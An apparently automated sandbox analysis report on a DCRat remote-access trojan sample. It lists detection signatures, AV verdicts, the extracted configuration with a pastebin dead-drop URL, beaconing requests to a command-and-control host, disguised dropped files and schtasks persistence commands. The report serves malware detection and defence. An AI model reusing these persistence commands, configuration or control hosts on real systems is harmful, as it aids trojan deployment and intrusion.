Windows Analysis Report
QIKiV83Pkl.exe

Overview

General Information

Sample name: QIKiV83Pkl.exe
renamed because original name is a hash value
Original sample name: 2c00ebc767b339c3baf6bcf3086edf51.exe
Analysis ID: 1483416
MD5: 2c00ebc767b339c3baf6bcf3086edf51
SHA1: fd1aac21bf1604a175e1d87fa174d832503e3a79
SHA256: 67e022273972cda8e1633f002043e4f03cc62bf603bfc95dd5c78af8c0cfb5d2
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Program Location with Network Connections
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: QIKiV83Pkl.exe Avira: detected
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\brokermonitordhcp\portruntime.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Default\conhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe Avira: detection malicious, Label: VBS/Runner.VPG
Source: portruntime.exe.3212.5.memstrmin Malware Configuration Extractor: DCRat {"SCRT": "{\"X\":\"(\",\"Y\":\"~\",\"B\":\">\",\"y\":\"|\",\"C\":\";\",\"v\":\"$\",\"Q\":\"@\",\"c\":\"!\",\"L\":\"*\",\"3\":\",\",\"i\":\"&\",\"M\":\"_\",\"a\":\"#\",\"o\":\".\",\"J\":\"%\",\"d\":\"<\",\"m\":\"`\",\"S\":\")\",\"e\":\"^\",\"R\":\" \",\"h\":\"-\"}", "PCRT": "{\"Z\":\">\",\"r\":\")\",\"T\":\" \",\"V\":\"*\",\"D\":\"~\",\"L\":\"^\",\"m\":\"%\",\"U\":\".\",\"b\":\"#\",\"Y\":\"-\",\"B\":\"`\",\"Q\":\"&\",\"x\":\"(\",\"1\":\"<\",\"H\":\";\",\"C\":\"$\",\"W\":\"|\",\"k\":\"!\",\"R\":\",\",\"F\":\"_\",\"0\":\"@\"}", "TAG": "", "MUTEX": "DCR_MUTEX-aA95Mrr0umnIfNKyuBZl", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "DCL": "https://pastebin.com/raw/i8wetBiv", "T": "1"}
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe ReversingLabs: Detection: 87%
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe Virustotal: Detection: 67% Perma Link
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Virustotal: Detection: 67% Perma Link
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe ReversingLabs: Detection: 87%
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Virustotal: Detection: 67% Perma Link
Source: C:\Users\Default\conhost.exe ReversingLabs: Detection: 87%
Source: C:\Users\Default\conhost.exe Virustotal: Detection: 67% Perma Link
Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe ReversingLabs: Detection: 87%
Source: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe Virustotal: Detection: 67% Perma Link
Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe ReversingLabs: Detection: 87%
Source: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe Virustotal: Detection: 67% Perma Link
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe ReversingLabs: Detection: 87%
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Virustotal: Detection: 67% Perma Link
Source: C:\brokermonitordhcp\portruntime.exe ReversingLabs: Detection: 87%
Source: C:\brokermonitordhcp\portruntime.exe Virustotal: Detection: 67% Perma Link
Source: QIKiV83Pkl.exe ReversingLabs: Detection: 71%
Source: QIKiV83Pkl.exe Virustotal: Detection: 59% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe Joe Sandbox ML: detected
Source: C:\brokermonitordhcp\portruntime.exe Joe Sandbox ML: detected
Source: C:\Users\Default\conhost.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Joe Sandbox ML: detected
Source: QIKiV83Pkl.exe Joe Sandbox ML: detected
Source: QIKiV83Pkl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\brokermonitordhcp\portruntime.exe Directory created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Directory created: C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7b Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76d Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: QIKiV83Pkl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QIKiV83Pkl.exe
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0087A5F4
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0088B8E0
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089AAA8 FindFirstFileExA, 0_2_0089AAA8
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Code function: 4x nop then jmp 00007FFAAC48CCDAh 21_2_00007FFAAC48CBD9

Networking

barindex
Source: unknown DNS query: name: pastebin.com
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /raw/i8wetBiv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.techConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.tech
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /raw/i8wetBiv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.techConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: romangw5.beget.tech
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: global traffic DNS traffic detected: DNS query: romangw5.beget.tech
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://romangw5.beget.tech
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://romangw5.beget.tech/
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f
Source: portruntime.exe, 00000005.00000002.1474905892.000000000300D000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/i8wetBiv
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49704 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_0087718C
Source: C:\brokermonitordhcp\portruntime.exe File created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File created: C:\Windows\Downloaded Program Files\be621495aa6c7b Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087857B 0_2_0087857B
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_008870BF 0_2_008870BF
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089D00E 0_2_0089D00E
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087407E 0_2_0087407E
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_008A1194 0_2_008A1194
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00873281 0_2_00873281
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087E2A0 0_2_0087E2A0
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_008902F6 0_2_008902F6
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00886646 0_2_00886646
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_008837C1 0_2_008837C1
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_008727E8 0_2_008727E8
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089070E 0_2_0089070E
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089473A 0_2_0089473A
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087E8A0 0_2_0087E8A0
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00894969 0_2_00894969
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087F968 0_2_0087F968
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00883A3C 0_2_00883A3C
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00886A7B 0_2_00886A7B
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00890B43 0_2_00890B43
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089CB60 0_2_0089CB60
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00885C77 0_2_00885C77
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088FDFA 0_2_0088FDFA
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087ED14 0_2_0087ED14
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00883D6D 0_2_00883D6D
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087BE13 0_2_0087BE13
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087DE6C 0_2_0087DE6C
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00875F3C 0_2_00875F3C
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00890F78 0_2_00890F78
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: String function: 0088E28C appears 35 times
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: String function: 0088E360 appears 52 times
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: String function: 0088ED00 appears 31 times
Source: portruntime.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe0.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe1.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: winlogon.exe.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HuzhgkcqwYiFfxvhdfMUs.exe2.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QIKiV83Pkl.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QIKiV83Pkl.exe
Source: QIKiV83Pkl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.evad.winEXE@39/22@2/2
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00876EC9 GetLastError,FormatMessageW, 0_2_00876EC9
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_00889E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00889E1C
Source: C:\brokermonitordhcp\portruntime.exe File created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File created: C:\Users\Default\conhost.exe Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\53353b0acecc245765fbbf262d53597803ae4f8c
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\brokermonitordhcp\portruntime.exe File created: C:\Users\user\AppData\Local\Temp\kxib6YnpdJ Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Command line argument: sfxname 0_2_0088D5D4
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Command line argument: sfxstime 0_2_0088D5D4
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Command line argument: STARTDLG 0_2_0088D5D4
Source: QIKiV83Pkl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QIKiV83Pkl.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\brokermonitordhcp\portruntime.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: QIKiV83Pkl.exe ReversingLabs: Detection: 71%
Source: QIKiV83Pkl.exe Virustotal: Detection: 59%
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe File read: C:\Users\user\Desktop\QIKiV83Pkl.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\QIKiV83Pkl.exe "C:\Users\user\Desktop\QIKiV83Pkl.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
